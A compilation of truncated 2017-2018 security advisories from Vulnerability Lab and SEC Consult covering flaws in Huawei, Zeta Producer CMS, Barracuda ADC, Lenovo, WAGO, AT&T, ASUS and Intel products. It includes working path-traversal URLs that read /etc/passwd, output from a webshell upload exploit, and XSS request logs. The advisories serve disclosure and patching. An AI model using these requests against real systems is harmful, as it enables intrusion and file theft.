V100R002C00B100 Exploitation Technique: === Local Severity Level: === Medium Authentication Type: Restricted authentication (user/moderator) - User privileges User Interaction: = No User Interaction Disclosure Type: Responsible Disclosure Program Technical Details & Description: A buffer overflow causing a denial of service vulnerability has been discovered in the official Huawei eNSP v1. The vulnerability allows to an attacker to crash or shutdown the software process by unexpected behavior. Huawei eNSP is vulnerable to a buffer overflow resulting in a denial of service, caused by improper validation of specific command line parameter. A local authenticated attacker could exploit the vulnerability to cause the software process to become abnormal with unexpected behavior and unhandled errors by sending a special crafted paket requests. Solution - Fix & Patch: === Huawei has released software updates to fix this security vulnerability. Customers of the product should contact Huawei TAC (Huawei Technical Assistance Center) to request the upgrades contents. This advisory is available at the following link: http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20180309-01-ensp-en Security Risk: == The security risk of the buffer overflow causing a denial of service and unhandled unexpected errors in the huawei ensp v1 is estimated as medium. Credits & Authors: == S.AbenMassaoud [Vulnerability Laboratory Core Research Team] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php v
SEC Consult SA-20180712-0 :: Remote Code Execution & Local File Disclosure in Zeta Producer Desktop CMS
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 > === title: Remote Code Execution & Local File Disclosure product: Zeta Producer Desktop CMS vulnerable version: <=14.2.0 fixed version: >=14.2.1 CVE number: CVE-2018-13981, CVE-2018-13980 impact: critical homepage: https://www.zeta-producer.com found: 2017-11-25 by: P. Morimoto (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "With Zeta Producer, the website builder and online shop system for Windows, you can create and manage your website locally, on your computer. Get without expertise in 3 steps to your own homepage: select design, paste content, publish website. Finished." Source: https://www.zeta-producer.com/de/index.html Business recommendation: The vendor provides a patched version which should be installed immediately. Users of the product also need to verify that the affected widgets are updated in the corresponding website project! It could be necessary to rebuild the whole project or copy the new widgets to the website projects. For further information consult the vendor. Furthermore, an in-depth security analysis is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1) Remote Code Execution (CVE-2018-13981) The email contact functionality of the widget "formmailer" can upload files to the server but if the user uploads a PHP script with a .php extension then the server will rename it to .phps to prevent PHP code execution. However, the attacker can upload .php5 or .phtml to the server without any restriction. These alternative file extensions can be executed as PHP code. Furthermore, the server will create a folder to store the files, with a random name using PHP's "uniqid" function. Unfortunately, if the server permits directory listing, the attacker can easily browse to the uploaded PHP script. If no directory listing is enabled the attacker can still bruteforce the random name to gain remote code execution via the PHP script as well. Testing on a local server it took about 20 seconds to brute force the random name. This attack will be slower over the Internet but it is still feasible. Also, if the user runs the Zeta Producer Desktop CMS GUI client locally, they are also vulnerable because the web server will be running on TCP port 9153. The root cause is in the widget "formmailer" which is enabled by default. The following files are affected: - /assets/php/formmailer/SendEmail.php - /assets/php/formmailer/functions.php 2) Local File Disclosure (CVE-2018-13980) If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an unauthenticated attacker can read local files by exploiting path traversal issues. The following files are affected: - /assets/php/filebrowser/filebrowser.main.php Proof of concept: - 1) Remote Code Execution (CVE-2018-13981) The following python script can be used to exploit the chain of vulnerabilities. [.. code has been removed to prevent misuses ..] When the script is executed, a PHP script (shell) will be uploaded automatically. # $ python exploit.py # [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php # # 5a1a5bc991afe # 5a1a5bc99453a # 10812 # [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5 # uid=33(www-data) gid=33(www-data) groups=33(www-data) 2) Local File Disclosure (CVE-2018-13980) The parameter "file" in the "filebrowser.main.php" script can be exploited to read arbitrary files from the OS with the privileges of the web server user. Any unauthenticated user can exploit this issue! http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd=download http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc=list Vulnerable / tested versions: - The following versions have been tested which were the latest version available at the time of the test: Zeta Producer Desktop CMS 14.1.0 Zeta Producer Desktop CMS 14.2.0 Source: - https://www.zeta-producer.com/de/download.html - https://github.com/ZetaSoftware/zeta-producer-content/ Vendor contact timeline: 2017-11-29: Contacting vendor through i...@zeta-producer.com and various other email addresses from the website. No reply. 2017-12-13:
Barracuda ADC v5.x - Multiple Persistent Vulnerabilities
le last hour, last day and last week input field values. Restrict the input and disallow special chars. Filter the context of the values to prevent an execution of script code and implement a secure valudatuib mechanism to the broken output in the dashboard service. Note: The issue was reported in 2016 to the barracuda networks developer team. The issue was finally resolved in 2017 Q1 - Q4. The disclosure process took about 1 year to complete by recognizing the patch cycle. Security Risk: == The security risk of the persistent input validation web vulnerability in the barracuda networks adc appliance web-application is estimated as medium. Credits & Authors: == Benjamin K.M. (Vulnerability Laboratory Core Research Team) - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Lenovo SU v5.07 - Buffer Overflow & Arbitrary Code Execution Vulnerability
ile flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type:1.0 App File date:. Translations: 0409.04b0 ProductName: Map Network Drive InternalName: mapdrv OriginalFilename: mapdrv.exe ProductVersion: 1, 0, 0, 1 FileVersion: 1, 0, 0, 1 FileDescription: Map Network Drive Application LegalCopyright: Copyright Lenovo 2005, 2006, all rights reserved. Copyright IBM Corporation 1996-2005, all rights reserved. Solution - Fix & Patch: === Update Lenovo System Update to version 5.07.0072 or later. You can determine the currently installed version by opening Lenovo System Update, clicking on the green question mark in the top right corner and then selecting “About.” Lenovo System Update can be updated by choosing either of the following methods: Lenovo System Update automatically checks for a later version whenever the application is run. Click OK when prompted that a new version is available. To manually update, download the latest version from the following URL: https://support.lenovo.com/en/documents/ht080136 Security Risk: == The security risk of the buffer overflow and arbitrary code execution vulnerability is estimated as high. Credits & Authors: == S.AbenMassaoud - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
SEC Consult SA-20180711-0 :: Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 > === title: Remote code execution via multiple attack vectors product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1 vulnerable version: FW 01 - 01.01.10(01) fixed version: FW 02 CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981 impact: High homepage: https://www.wago.com/ found: 2018-04-25 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "New ideas are the driving force behind our success WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60 years, WAGO has developed and produced innovative products for packaging, transportation, process, industrial and building automation markets amongst others. Aside from its innovations in spring pressure connection technology, WAGO has introduced numerous innovations that have revolutionized industry. Further ground-breaking inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®." Source: http://www.wago.us/wago/ "For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY 7300T Web Panels help you reinforce the quality of your machinery and equipment with a refined design and industry-leading software. Learn more about how the right Web Panels make a difference. HMI components are the finishing touch for machines or systems and they have an overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing HMIs that leave a lasting impression and significantly increase both the value and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes." Source: http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp Business recommendation: HMI displays are widely used in SCADA infrastructures. The link between their administrative (or informational) web interfaces and the users which access these interfaces is critical. The presented attacks demonstrate how simple it is to inject malicious code in order to break the security of this link by exploiting minimal user interaction. As a consequence a computer which is used for HMI administration should not provide any possibility to get compromised via malicious script code. One possible solution may be e.g.: * Don't allow email clients * Don't provide Internet access at all on the HMI stations SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: --- 1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981) Reflected cross site scripting vulnerabilities were identified within multiple PHP scripts in the admin interface. The parameter JSON input which is sent to the device is not sanitized sufficiently. An attacker can exploit this vulnerability to execute arbitrary scripts in the context of the attacked user and gain control over the active session. This vulnerability is present for authenticated and unauthenticated users! 2) Stored Cross-Site Scripting (CVE-2018-12981) A stored cross-site scripting vulnerability was identified within the "PLC List" which can be configured in the web interface of the e!Display. By storing a payload there, an administrative or guest user can be attacked without tricking them to visit a malicious web site or clicking on an malicious link. This vulnerability is only present for authenticated users! 3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980) Arbitrary files can be uploaded to the system without any check. It is even possible to change the location of the uploaded file on the system. As the web service does not run as privileged user, it is not possible to upload a file directly to the web root but on many other locations on the file system. The normal user 'user' and the administrative user 'admin' can both upload files to the system. 4) Incorrect Default Permissions (CVE-2018-12979) Due to incorrect default permissions a file in the web root can be overwritten by the unprivileged 'www' user. This is the same user which is used in the context of the web server. 5) Remote code execution via
AT Bizcircle - Persistent Profile Cross Site Scripting Vulnerabilities
circle.att.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/] Cookie[PHPSESSID=l18mlg2dueco0q3h6kb131eub7; AMCV_55633F7A534535110A490D44%40AdobeOrg=2096510701%7CM CIDTS%7C17396%7CMCMID%7C26100431646396483062447545331633367848%7CMCAAMLH-1503573649%7C6%7CMCAAMB-1503573649 %7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1502976049s%7CNONE%7CMCAID%7CNONE%7CMCSYNCSOP%7C411-17403%7CvVersion%7C2.0.0; mbox=session#1502968849133-685067#1502970967|PC#1502968849133-685067.26_19#1504178707; AMCVS_55633F7A534535110 A490D44%40AdobeOrg=1; _ga=GA1.2.774089946.1502968850; _gid=GA1.2.1647846308.1502968850; s_cc=true; bp-activity-oldestpage=1; aam_uuid=26195646366965627042419912699465776394; Successful Registration=true; TLTSID=DFFB796CF9727EB3DAD892F1CE4732DB; fsr.s={"v2":1,"v1":1,"rid":"d036702-53861434-b5e4-2910-b41f2", "cp":{"ufix":"no","ug":"n","platform":"mSite","WLS_TSR":"no"},"to":4.5,"pv":6,"f":1502969105924}; wordpress_logged_in_cae26c4a20b3aee9c355ac89848c9a6c=att1759500603%7C1503141687%7C5r0gGlSD0k4TLZ8DdczeF GgpYJrrbeqwy9p8pvslaMr%7Cab6915c095b9e9a27373469d6f4cae49510879dab933281d16868d1cf4bd524a; _gat=1] Connection[keep-alive] Response Header: Server[Apache] X-Frame-Options[SAMEORIGIN] Cache-Control[no-cache, must-revalidate, max-age=0] X-UA-Compatible[IE=edge] Content-Type[text/html; charset=UTF-8] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[19404] Connection[keep-alive] Reference(s): https://bizcircle.att.com/ https://bizcircle.att.com/members/ https://bizcircle.att.com/members/att1759500603/ https://bizcircle.att.com/members/att1759500603/profile/ https://bizcircle.att.com/members/att1759500603/profile/edit/ https://bizcircle.att.com/members/att1759500603/profile/edit/group/ https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/ Solution - Fix & Patch: === The vulnerability has been patched by the at developer team of the biz circle team. The issue was part of the official bug bounty program. Security Risk: == The security risk of the persistent cross site vulnerabilities in the web-application are estimated as medium (CVSS 4.6). Credits & Authors: == Benjamin K.M. [Vulnerability Laboratory Core Research Team] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Barracuda ADC 5.x - Client Side Cross Site Scripting Vulnerability
ENT SIDE SCRIPT CODE EXECUTION!] Mime Type[text/html] Request Header: Host[adc.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://adc.localhost:8080/cgi-mod/index.cgi?password=48c669c1112b5fd89648930d335f0d8b=141302_type=Local_only=1=evil.source[NON-PERSISTENT INJECTED SCRIPT CODE PAYLOAD!]%3Ecross-site-scripting=de_DE_secondary_tab=view_internal_patterns_tab=SECURITY=_tab=copy_internal_attack_patterns=guest=1_name=libraries496409_width=725_height=500] Cookie[_ga=GA1.2.608616028.1422207688; _ga=GA1.2.608616028.1422207688; _gat=1] Connection[keep-alive] Response Header: Server[BarracudaHTTP 4.0] Content-Type[text/html] Content-Length[1949] Connection[close] Reference(s): http://adc.localhost:8080/ http://adc.localhost:8080/cgi-mod/ http://adc.localhost:8080/cgi-mod/index.cgi http://adc.localhost:8080/cgi-mod/index.cgi?password= http://adc.localhost:8080/cgi-mod/index.cgi?password=x=x http://adc.localhost:8080/cgi-mod/index.cgi?password=x=x_type=Local http://adc.localhost:8080/cgi-mod/index.cgi?password=x=x_type=Local_only= http://adc.localhost:8080/cgi-mod/index.cgi?password=x=x_type=Local_only=1= Solution - Fix & Patch: === The vulnerability can be patched by a parse and encode of the vulnerable group value in the copy|kopieren module GET method request. Restrict the input and disallow the usage of special chars to prevent client-side script code injection attacks. Implement a secure exception-handling to prevent client-side script code injection attacks. Note: The issue has been reported in 2016 Q4 (2016-10-01) and was finally resolved in 2017 Q3 - Q4 by the barracuda networks developer team in all appliance series. Security Risk: == The security risk of the non-persistent input validation web vulnerability in the barracuda networks adc appliance web-application is estimated as medium (CVSS 3.6). Credits & Authors: == Benjamin K.M. - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Barracuda ADC 5.x - Filter Bypass & Persistent Validation Vulnerability
/virtual_services/Corp_Web/ http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/ http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/ http://adc.localhost:8080/restapi/v2/virtual_service_groups/ Solution - Fix & Patch: === The vulnerability can be patched by a parse and encode of the vulnerable content rules input field values. Restrict the input and disallow special chars. Filter and parse the item listing in the configured server module to prevent an execution. Implement a own exception-handling to prevent application-side script code executions. Security Risk: == The security risk of the persistent input validation web vulnerability in the barracuda networks adc appliance web-application is estimated as medium (CVSS 3.8). Note: The issue was reported in 2016 to the barracuda networks developer team. The issue was finally resolved in 2017 Q1 - Q4. The disclosure process took about 1 year to complete by recognizing the patch cycle. Credits & Authors: == Benjamin K.M. - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability
ype[text/html] Request Header: Host[event.localhost] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html] Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0] Connection[keep-alive] Upgrade-Insecure-Requests[1] If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT] If-None-Match["31793159796dce1:0"] Cache-Control[max-age=0] Response Header: Content-Type[text/html] Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT] Etag["31793159796dce1:0"] Connection[keep-alive] - Status: 200[OK] GET http://event.localhost/nw/_ui/en/evil.source%3C/td Mime Type[text/html] Request Header: Host[event.localhost] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[http://event.localhost/nw/_ui/en/ParentalControl.html] Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Content-Type[text/html] Server[Microsoft-IIS/7.5] X-Powered-By[ASP.NET] Content-Length[1245] Connection[keep-alive] Reference(s): http://event.localhost/ http://event.localhost/nw/ http://event.localhost/nw/_ui/ Solution - Fix & Patch: === The issue has been reported in 2016 Q4 (2016-11-09) and was finally resolved in 2017 Q3 - Q4 by the asus wrt developer team. The public disclosure process took about 10 month. Security Risk: == The security risk of the persistent cross site scripting web vulnerability in the asus wrt ui is estimated as medium (CVSS 3.0). Credits & Authors: ====== Lawrence Amer (Vulnerability Lab Core Research Team) [zeroat...@gmail.com] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Intel System CU - Buffer Overflow (Denial of Service) Vulnerability
Document Title: === Intel System CU - Buffer Overflow (Denial of Service) Vulnerability References (Source): https://www.vulnerability-lab.com/get_content.php?id=2133 Security ID: INTEL-SA-00134 https://nvd.nist.gov/vuln/detail/CVE-2018-3661 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3661 Acknowledgements: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00134.html http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3661 CVE-ID: === CVE-2018-3661 Release Date: = 2018-07-11 Vulnerability Laboratory ID (VL-ID): 2133 Common Vulnerability Scoring System: 5.5 Vulnerability Class: Buffer Overflow Current Estimated Price: 3.000€ - 4.000€ Abstract Advisory Information: == The vulnerability laboratory core research team discovered a local buffer overflow vulnerability in the official Intel System CU 14.0 and 14.1. Vulnerability Disclosure Timeline: == 2018-05-15: Release Date (Intel) 2018-07-11: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Intel Systems Product: Intel System - CU (Utilities) 14.0 build & 14.1 build - (Intel® C620 Series Chipsets b19) Exploitation Technique: === Local Severity Level: === Medium Authentication Type: Restricted authentication (user/moderator) - User privileges User Interaction: = No User Interaction Disclosure Type: Bug Bounty Program Technical Details & Description: A local buffer overflow vulnerability has been discovered in the official Intel System CU 14.0 and 14.1 utilities. The vulnerability can be exploited by local attackers to overwrite active registers to compromise the process or affected computer system. Intel system configuration utilities are vulnerable to a denial of service, caused by a classic buffer overflow. By sending a specially-crafted request, a local authenticated attacker could exploit this vulnerability to cause a denial of service condition. Affected are versions of syscfg.exe before release 14.0 build 16 or for systems based on Intel® C620 Series Chipsets 14.1 build 19. Affected are Versions of selview.exe before release 14.0 build 21 or for systems based on Intel® C620 Series Chipsets before 14.0 build 11. Exploitation of the local buffer overflow vulnerability requires no user interaction and system process privileges. Successful exploitation of the buffer overflow vulnerability results in a compromise of the local system process or affected computer system. Vulnerable File(s): [+] syscfg.exe [+] selview.exe https://www.vulnerability-lab.com/resources/pictures/2133/Intel1.jpg https://www.vulnerability-lab.com/resources/pictures/2133/Intel2.jpg Security Risk: == The security risk of the exploitable local buffer overflow vulnerability in the utilities software is estimated as medium. Credits & Authors: == S.AbenMassaoud - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special 